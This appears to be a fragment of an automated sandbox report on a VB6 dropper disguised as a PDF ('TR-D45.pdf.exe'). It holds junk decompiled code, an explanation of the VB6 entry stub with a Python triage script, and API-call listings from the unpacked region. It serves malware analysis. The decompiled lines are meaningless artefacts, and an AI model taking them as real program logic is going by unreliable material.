                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					while(1) {
                                                        						L5:
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t76 =  *_t76 + _t76;
                                                        						 *0 =  *0;
                                                        						 *0 =  *0;
                                                        						 *0 =  *0;
                                                        						 *0 =  *0;
                                                        						 *((intOrPtr*)(_t89 + 0x9b)) =  *((intOrPtr*)(_t89 + 0x9b)) + _t85;
                                                        						 *0 =  *0;
                                                        						 *0 =  *0;
                                                        						 *0 =  *0;
                                                        						 *0x0000B089 =  *0x0000B089 | _t89;
                                                        						 *0 =  *0;
                                                        						 *0 =  *0;
                                                        						 *0 =  *0;
                                                        						_t57 = 0x778b9b;
                                                        						 *0x778b9b =  *0x778b9b;
                                                        						 *0x778b9b =  *0x778b9b;
                                                        						 *0x778b9b =  *0x778b9b;
                                                        						 *0x778b9b =  *0x778b9b;
                                                        						 *0x778b9b =  *0x778b9b;
                                                        						 *0x778b9b =  *0x778b9b;
                                                        						_t70 = 0x8b;
                                                        						_t76 =  *0x0000B813;
                                                        						while(1) {
                                                        							 *_t89 = _t85;
                                                        							 *_t70 =  *_t70 + _t76;
                                                        							if( *_t70 != 0) {
                                                        								goto L5;
                                                        							}
                                                        							 *_t57 =  *_t57 + _t57;
                                                        							 *((intOrPtr*)(_t89 - 0x67474848)) =  *((intOrPtr*)(_t89 - 0x67474848)) + _t85;
                                                        							 *_t70 =  *_t70 +  *((intOrPtr*)(_t70 + 0xb08b7b));
                                                        							_t76 =  *((intOrPtr*)(_t70 - 0x47474778));
                                                        							 *0xFFFFFFFFB8B96970 =  *0xFFFFFFFFB8B96970 | _t70;
                                                        							_t57 = 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							_t89 =  *(_t70 - 0x45);
                                                        							if( *0x80b9b8 != 0) {
                                                        								continue;
                                                        							}
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							asm("invalid");
                                                        							 *0x80b9b8 =  *0x80b9b8 + 1;
                                                        							asm("invalid");
                                                        							 *0x80b9b8 =  *0x80b9b8 + 1;
                                                        							asm("invalid");
                                                        							 *0x80b9b8 =  *0x80b9b8 + 1;
                                                        							asm("invalid");
                                                        							 *0x80b9b8 =  *0x80b9b8 + 1;
                                                        							asm("invalid");
                                                        							 *0x80b9b8 =  *0x80b9b8 + 1;
                                                        							asm("invalid");
                                                        							 *0x80b9b8 =  *0x80b9b8 + 1;
                                                        							asm("out 0xff, eax");
                                                        						}
                                                        					}
                                                        				}
                                                        				asm("o16 jnz 0x6f");
                                                        				asm("outsb");
                                                        				if(_t103 >= 0) {
                                                        					goto L4;
                                                        				}
                                                        				_t61 = _t57 | 0x55001101;
                                                        				_t92 = _t90;
                                                        				_t100 = _t99 - 1;
                                                        				_t101 = _t100 - 1;
                                                        				_t76 = _t101;
                                                        				 *0xfd68147 =  *0xfd68147 + 0x2b;
                                                        				 *_t61 =  *_t61 + _t61;
                                                        				_t85 = _t85 + 2;
                                                        				 *_t85 =  *_t85 + 0xde;
                                                        				asm("scasb");
                                                        				_t62 = _t61 & 0x00000000;
                                                        				 *((intOrPtr*)(_t101 +  *0x2b + _t92 * 2)) =  *((intOrPtr*)(_t101 +  *0x2b + _t92 * 2)) + 0xfd68146;
                                                        				 *((intOrPtr*)(_t92 + 0x24)) =  *((intOrPtr*)(_t92 + 0x24)) + 0xde;
                                                        				 *0xfd68147 =  *0xfd68147 + 0x2b;
                                                        				 *0x2b =  *0x2b + 0x2b;
                                                        				 *_t62 =  *_t62 + 0x2b;
                                                        				asm("sbb [eax], dl");
                                                        				 *0xfd68147 =  *0xfd68147 + 0x2b;
                                                        				 *((intOrPtr*)(_t62 + _t62)) =  *((intOrPtr*)(_t62 + _t62)) + 0x2b;
                                                        				0x36401460(_t100, 0x2b, _t85, _t99);
                                                        				 *_t62 =  *_t62 + 0x2b;
                                                        				 *_t62 =  *_t62 + 0x2b;
                                                        				asm("sbb [eax], al");
                                                        				 *0xfd68147 =  *0xfd68147 + 0x2b;
                                                        				 *_t62 =  *_t62 + 0xfd68146;
                                                        				_t63 = _t62 + 0xfd68146;
                                                        				_push(es);
                                                        				 *_t63 =  *_t63 + 0x2b;
                                                        				_push(es);
                                                        				_t57 = _t63;
                                                        				 *_t57 =  *_t57 + 0x2b;
                                                        				asm("sbb [eax], al");
                                                        				 *0xfd68147 =  *0xfd68147 + 0x2b;
                                                        				 *_t57 =  *_t57 + 0xde;
                                                        				 *((intOrPtr*)(_t57 - 0x69fffff7)) =  *((intOrPtr*)(_t57 - 0x69fffff7)) + 0xfd68146;
                                                        				asm("adc [eax], eax");
                                                        				 *_t57 =  *_t57 + 0xfd68146;
                                                        				 *_t57 =  *_t57 + 0x2b;
                                                        				 *_t57 =  *_t57 + 0x2b;
                                                        				goto L3;
                                                        			}
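
The decompiled _entry_() above is the stock VB6 entry stub: a push of the VB header address (the "VB5!6&*" signature the decompiler shows as a string) followed by a call to the MSVBVM60!ThunRTMain thunk at 0x0040135A. That call never returns, so the bytes after it (zero padding and then the VB header data) are never executed; a decompiler that falls through the call decodes 00 00 as add [eax], al, which is where the long runs of *_t49 = *_t49 + _t49; and the 22% quality score come from. The Python below is an added triage example, not code from the Joe Sandbox report or from the sample: it builds a constructed .text image with the same layout (the entry and thunk addresses follow the report's listing, the header address 0x00401370 and the IAT slot are assumptions), recognises the stub, validates the "VB5!" header, and records that what follows the call is data rather than code.

```python
import struct
from typing import Optional

# Constructed stand-in for the beginning of a VB6 executable's .text section.
# These are NOT bytes taken from TR-D45.pdf.exe; they only reproduce the layout
# the VB6 linker emits: a jmp-through-IAT thunk for MSVBVM60!ThunRTMain, the
# two-instruction entry stub, zero padding, then the VB header ("VB5!...").
# The entry (0x00401360) and thunk (0x0040135A) addresses follow the report's
# listing; the header address 0x00401370 and the IAT slot are assumptions.
TEXT_VA = 0x00401000
ENTRY_VA = 0x00401360
THUNK_VA = 0x0040135A
HEADER_VA = 0x00401370
IAT_SLOT_VA = 0x00401010


def build_sample_text() -> bytes:
    """Build the constructed .text image described above."""
    text = bytearray(0x400)           # zero-filled: everything unset is 00 bytes

    def put(va: int, data: bytes) -> None:
        off = va - TEXT_VA
        text[off:off + len(data)] = data

    put(THUNK_VA, b"\xFF\x25" + struct.pack("<I", IAT_SLOT_VA))   # jmp dword ptr [IAT]
    put(ENTRY_VA, b"\x68" + struct.pack("<I", HEADER_VA))         # push offset VBHeader
    call_va = ENTRY_VA + 5
    rel32 = THUNK_VA - (call_va + 5)                               # E8 is relative to next insn
    put(call_va, b"\xE8" + struct.pack("<i", rel32))               # call ThunRTMain thunk
    put(HEADER_VA, b"VB5!6&*" + b"\x00" * 9)                       # start of the VB header
    return bytes(text)


def find_vb6_entry(text: bytes, text_va: int, entry_va: int) -> Optional[dict]:
    """Recognise the VB6 entry stub `push imm32; call rel32` and validate that
    imm32 points at a "VB5!" header. Returns None if the shape does not match."""
    off = entry_va - text_va
    if off < 0 or off + 10 > len(text):
        return None
    if text[off] != 0x68 or text[off + 5] != 0xE8:
        return None
    header_va = struct.unpack_from("<I", text, off + 1)[0]
    rel32 = struct.unpack_from("<i", text, off + 6)[0]
    call_target_va = entry_va + 10 + rel32

    hoff = header_va - text_va
    if not (0 <= hoff <= len(text) - 8) or text[hoff:hoff + 4] != b"VB5!":
        return None
    signature = text[hoff:hoff + 8].split(b"\x00")[0]

    # The call normally lands on a 6-byte `jmp dword ptr [IAT slot]` thunk.
    toff = call_target_va - text_va
    thunk_is_iat_jmp = 0 <= toff <= len(text) - 6 and text[toff:toff + 2] == b"\xFF\x25"
    iat_slot_va = struct.unpack_from("<I", text, toff + 2)[0] if thunk_is_iat_jmp else None

    # Everything after the call is data, never reached as code; a decompiler that
    # falls through the call decodes 00 00 as `add [eax], al`, which is what the
    # repeated `*_t49 = *_t49 + _t49;` lines in the report are.
    after_call = text[off + 10:off + 16]
    return {
        "header_va": header_va,
        "signature": signature,
        "call_target_va": call_target_va,
        "thunk_is_iat_jmp": thunk_is_iat_jmp,
        "iat_slot_va": iat_slot_va,
        "bytes_after_call_are_zero": after_call.count(0) == len(after_call),
    }


if __name__ == "__main__":
    result = find_vb6_entry(build_sample_text(), TEXT_VA, ENTRY_VA)
    for k, v in result.items():
        print(f"{k}: {v:#x}" if isinstance(v, int) and not isinstance(v, bool) else f"{k}: {v}")
```

On a real file, feed the function the mapped .text section and the entry point RVA plus image base from the PE optional header; a positive result means the useful reversing target is the VB header the push points at (and, for a GuLoader-style dropper, the shellcode it later unpacks), not the instructions the decompiler invented after the call.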

                                                        0x00401360
                                                        0x00401365
                                                        0x0040136a
                                                        0x0040136c
                                                        0x0040136e
                                                        0x00401370
                                                        0x00401372
                                                        0x00401374
                                                        0x00401375
                                                        0x00401377
                                                        0x00401379
                                                        0x0040137e
                                                        0x00401387
                                                        0x00401389
                                                        0x0040138b
                                                        0x0040138c
                                                        0x0040138e
                                                        0x00401390
                                                        0x00401392
                                                        0x00401394
                                                        0x00401396
                                                        0x00401398
                                                        0x0040139a
                                                        0x004013a3
                                                        0x004013a4
                                                        0x004013a5
                                                        0x004013a6
                                                        0x004013a7
                                                        0x004013aa
                                                        0x004013ab
                                                        0x004013ac
                                                        0x004013ae
                                                        0x004013b0
                                                        0x004013b2
                                                        0x004013b4
                                                        0x004013ba
                                                        0x004013bc
                                                        0x004013bf
                                                        0x004013c1
                                                        0x004013c8
                                                        0x004013c9
                                                        0x004013ca
                                                        0x004013d0
                                                        0x004013d0
                                                        0x004013d6
                                                        0x004013d7
                                                        0x004013e0
                                                        Disassembly listing (instruction text not preserved in this export; only the block addresses 0x004013e1 to 0x00401623 inside the 0x00401000 dump of the main module survived)

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247304234.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.247298815.0000000000400000.00000002.00020000.sdmp
                                                        • Associated: 00000000.00000002.247324366.0000000000412000.00000004.00020000.sdmp
                                                        • Associated: 00000000.00000002.247336514.0000000000414000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: #100
                                                        • String ID: VB5!6&*
                                                        • API String ID: 1341478452-3593831657
                                                        • Opcode ID: 4c8ab222cc87df943c5b91705abbf1f2e37a94dfe15da0ebf48d89da28344af9
                                                        • Instruction ID: 0ee42a331662020228214c3b1b8e6d799fa73fe16bbaaa2db77919e5b47cc1f5
                                                        • Opcode Fuzzy Hash: 4c8ab222cc87df943c5b91705abbf1f2e37a94dfe15da0ebf48d89da28344af9
                                                        • Instruction Fuzzy Hash: 1E5196A694E7C05FD30347709D2A2A13FB0AE13219B1A45DBD4C2CF0F3E658190ADB72
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID: rX4
                                                        • API String ID: 1029625771-805084833
                                                        • Opcode ID: d29cd9b4732a0350ca72b778ea24135a71c3c3beb448a0d134e03a209b258795
                                                        • Instruction ID: 6f2b799eba9fc3465e5976ed539d8801e3f4d163ecaabd90ac315f7bb5f7e0ff
                                                        • Opcode Fuzzy Hash: d29cd9b4732a0350ca72b778ea24135a71c3c3beb448a0d134e03a209b258795
                                                        • Instruction Fuzzy Hash: 5721F6F453930AEBCE202A209AA67FF921E9F43794F504117BC4352987DB25C48ACD53
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b715c537c44b22f792f3babd0f587ff397d52a0fe1a898b26971d713db5fcf75
                                                        • Instruction ID: c65378971a08b60570129674e7cadea0c789ab3c639350fe81b3e6dbfe457712
                                                        • Opcode Fuzzy Hash: b715c537c44b22f792f3babd0f587ff397d52a0fe1a898b26971d713db5fcf75
                                                        • Instruction Fuzzy Hash: 86616C30E44347AAEF3439648E987FE125F8F83764FA44516DCCBA35C2D766C9868913
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,02393893,00000004,00000000,?,?,0000084D,8166FD38,?,?,00000000,?), ref: 023941D0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadProcessTerminate
                                                        • String ID:
                                                        • API String ID: 3349790660-0
                                                        • Opcode ID: af4f0585fc045546e1aedeca53325ed0e19748a2969406f8a8c52f3ea40f1c00
                                                        • Instruction ID: 0df490c50c005bccd2cde69f9f17110853609b0ef56b8d99417f8f078b467845
                                                        • Opcode Fuzzy Hash: af4f0585fc045546e1aedeca53325ed0e19748a2969406f8a8c52f3ea40f1c00
                                                        • Instruction Fuzzy Hash: 00616B30A44343AAEF3439648E987FE115E8F83764FA44516DCCBA75C2D726C9868913
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,02393893,00000004,00000000,?,?,0000084D,8166FD38,?,?,00000000,?), ref: 023941D0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadProcessTerminate
                                                        • String ID:
                                                        • API String ID: 3349790660-0
                                                        • Opcode ID: dff6c4e88f94ed6cffb80845b26e38585dc9db71898126c61659f55ade45b4a4
                                                        • Instruction ID: 878aa130bc49372a43ef14646a69a40b4793b5f6777ca4ececb2e045b632fc5a
                                                        • Opcode Fuzzy Hash: dff6c4e88f94ed6cffb80845b26e38585dc9db71898126c61659f55ade45b4a4
                                                        • Instruction Fuzzy Hash: 68516D30A04343AAEF3439248E987FE115E8F83760FE4451ADCCBA75C2D726C9868913
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,02393893,00000004,00000000,?,?,0000084D,8166FD38,?,?,00000000,?), ref: 023941D0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadProcessTerminate
                                                        • String ID:
                                                        • API String ID: 3349790660-0
                                                        • Opcode ID: ccfe6abbb19860fd259560b6c29a8dfc09a024f377883e27620c2463b66f1e0d
                                                        • Instruction ID: 6521820b0b92d8c24dcd2bf4dfb72c9c4ddff935d82046ee30c9e7b79908cac5
                                                        • Opcode Fuzzy Hash: ccfe6abbb19860fd259560b6c29a8dfc09a024f377883e27620c2463b66f1e0d
                                                        • Instruction Fuzzy Hash: AC516C30A04343AAEF3439248D987FE115E8F83764FE4451AECCBA75C2DB26C9868913
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,02393893,00000004,00000000,?,?,0000084D,8166FD38,?,?,00000000,?), ref: 023941D0
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadProcessTerminate
                                                        • String ID:
                                                        • API String ID: 3349790660-0
                                                        • Opcode ID: 72114d175575765d89f248d775e6e1e156893bcff115c1643858ff15a4f47da1
                                                        • Instruction ID: bcdff7f5e01389f51dd6b924b2d94d2bdec0da33988ce515a9a98c59040d6a45
                                                        • Opcode Fuzzy Hash: 72114d175575765d89f248d775e6e1e156893bcff115c1643858ff15a4f47da1
                                                        • Instruction Fuzzy Hash: 3E518E31E44343AAEF3439148E9C7FE125E8F83764FA4451AECCBA65C2D766C985C913
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,02393893,00000004,00000000,?,?,0000084D,8166FD38,?,?,00000000,?), ref: 023941D0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadProcessTerminate
                                                        • String ID:
                                                        • API String ID: 3349790660-0
                                                        • Opcode ID: 5b322516c4403b3249ca7ab08a6328fbe97dfc7936aa632cbc213f73c3c93b36
                                                        • Instruction ID: 819ffb1fc7e35e329759643ea687357b1e5fa01fb6b72922185fd2afef727a93
                                                        • Opcode Fuzzy Hash: 5b322516c4403b3249ca7ab08a6328fbe97dfc7936aa632cbc213f73c3c93b36
                                                        • Instruction Fuzzy Hash: 1A518031D48343AEEF3539148D9C7FA126A9F83760FA4451AECCBA75C2D726C985C913
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,02393893,00000004,00000000,?,?,0000084D,8166FD38,?,?,00000000,?), ref: 023941D0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ProcessTerminate
                                                        • String ID:
                                                        • API String ID: 560597551-0
                                                        • Opcode ID: 36d8a2d6cfe4119b88b484e789cbb0c1c72b18390020ad54993608e8c6df08ff
                                                        • Instruction ID: d270e904c117daf2d73a1f3079addf9573abc76897ba592aae14a465467cb06c
                                                        • Opcode Fuzzy Hash: 36d8a2d6cfe4119b88b484e789cbb0c1c72b18390020ad54993608e8c6df08ff
                                                        • Instruction Fuzzy Hash: 39417030E44343BDEF3439144E9C7FE115A8F837A4FA4451AECCBA65C1D766C9858913
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,02393893,00000004,00000000,?,?,0000084D,8166FD38,?,?,00000000,?), ref: 023941D0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ProcessTerminate
                                                        • String ID:
                                                        • API String ID: 560597551-0
                                                        • Opcode ID: 2fd5e60378fb54368e3a6215b2fccfb0864b7f1017bc3c5ab35f9fad52c8e023
                                                        • Instruction ID: 9fa355a3808585887b036f04246cc71223be03297b47262f492986a1f7bd7d51
                                                        • Opcode Fuzzy Hash: 2fd5e60378fb54368e3a6215b2fccfb0864b7f1017bc3c5ab35f9fad52c8e023
                                                        • Instruction Fuzzy Hash: B8416030944343ADEF3439144E9C7FE115A9F837A4FA4451ADCCBA65C1D766C9858913
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,02393893,00000004,00000000,?,?,0000084D,8166FD38,?,?,00000000,?), ref: 023941D0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ProcessTerminate
                                                        • String ID:
                                                        • API String ID: 560597551-0
                                                        • Opcode ID: 5948583eee14fe3dbc8747ad33eb6485de75eba40a0e2564b8e5f20c2dbf4693
                                                        • Instruction ID: 084d558539fa90d106b22ab928b7698af893a23acecd8f2881ca7369fe762ebf
                                                        • Opcode Fuzzy Hash: 5948583eee14fe3dbc8747ad33eb6485de75eba40a0e2564b8e5f20c2dbf4693
                                                        • Instruction Fuzzy Hash: F7415F30904343AEEF3439184E9C7FE125A9F837A4FA84516DCCBE29D1D72AC9868913
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0aeacab90542ea32b5fd40d9b045edaa1df8bf6abba1dae5f1d40aa42ab2293e
                                                        • Instruction ID: 99ac350576181107954f92c2bac5f3f7220bf3211b9841a29e75a92ca46f758f
                                                        • Opcode Fuzzy Hash: 0aeacab90542ea32b5fd40d9b045edaa1df8bf6abba1dae5f1d40aa42ab2293e
                                                        • Instruction Fuzzy Hash: 69317F30904343ADEF3439284E9D7FE115A9F837A4FA4450ADCCBE2991D726C9868913
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c1ced2c3e3df8a94d4f49b8ec046c33a8a294313cc4beeb15754bf310e00bf91
                                                        • Instruction ID: ae923c1ff41825c52a29e7bbec041581c888ec2d0bdc55409a1cfe2c3c1c28ba
                                                        • Opcode Fuzzy Hash: c1ced2c3e3df8a94d4f49b8ec046c33a8a294313cc4beeb15754bf310e00bf91
                                                        • Instruction Fuzzy Hash: 36314B34904343A9EF3439284E9C3FE116A8F837A4FA88506DCCBE7991D726C9868913
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,02393893,00000004,00000000,?,?,0000084D,8166FD38,?,?,00000000,?), ref: 023941D0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadProcessTerminate
                                                        • String ID:
                                                        • API String ID: 3349790660-0
                                                        • Opcode ID: 3dec6c7c35b51823c500d769378d91c4ea0cdef28d69c01665989aa1e1581f04
                                                        • Instruction ID: 6a78ba91305130cdec698e68853d8a6e201a2ea9f4525169b5dcee5a09575c6f
                                                        • Opcode Fuzzy Hash: 3dec6c7c35b51823c500d769378d91c4ea0cdef28d69c01665989aa1e1581f04
                                                        • Instruction Fuzzy Hash: 7D314C30904347ADEF3439244E9D3FE116B9F837A4FA48506DCCBE6986DB66C5868D13
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • LdrInitializeThunk.NTDLL(-0000CFB3,?,-0000CFB3,02392119,001807C7,00000000,001807C7,0000003A,00000309,C781D084,02395B59,0239382E,?,0000084D,8166FD38), ref: 023957AE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InitializeLibraryLoadThunk
                                                        • String ID:
                                                        • API String ID: 3353482560-0
                                                        • Opcode ID: 14d6ab2c0ae0b07b98d7f1874006c85cb5409620171ace06fbb72094186c4c66
                                                        • Instruction ID: 23337b77de8a74a75c9026e6f45ab8d296d7409cf610716bf0e6fb3a4d1a5c1a
                                                        • Opcode Fuzzy Hash: 14d6ab2c0ae0b07b98d7f1874006c85cb5409620171ace06fbb72094186c4c66
                                                        • Instruction Fuzzy Hash: D331B03060A3899FCF359F7089653DA3FA6BF57340F94809EC8C64B246C7719A91CB56
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • LdrInitializeThunk.NTDLL(-0000CFB3,?,-0000CFB3,02392119,001807C7,00000000,001807C7,0000003A,00000309,C781D084,02395B59,0239382E,?,0000084D,8166FD38), ref: 023957AE
